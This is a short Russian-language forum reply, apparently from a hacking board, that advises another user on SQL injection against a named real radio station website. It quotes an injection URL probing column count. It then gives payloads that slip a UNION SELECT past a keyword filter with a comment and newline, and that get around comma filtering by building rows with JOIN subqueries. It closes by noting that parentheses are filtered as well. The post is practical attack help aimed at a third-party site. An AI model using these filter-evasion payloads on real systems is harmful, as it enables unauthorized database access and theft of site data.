Показать сообщение отдельно

  #23004  
Старый 25.11.2013, 17:59
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от kingbeef  
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+orde r+by+6--+f
Что касается Вашего первого поста. Фильтр на связку union select можно обойти следующим способом:

Цитата:
Сообщение от None  
UNION+--+%0DSELECT
Но до раскрутки еще далеко, вырезаюся запятые. Данный фильтр обходится созданием таблицы с помощью join:

Цитата:
Сообщение от None  
UNION+--+%0DSELECT*FROM(select 1)a join(select 2)b join(select 3)c join(select 4)d join(select 5)e join(select 6)f
Но далее видим, что фильтруются парные скобки (), так что ничего полезного взять с этого с сайта не получится.
 
Ответить с цитированием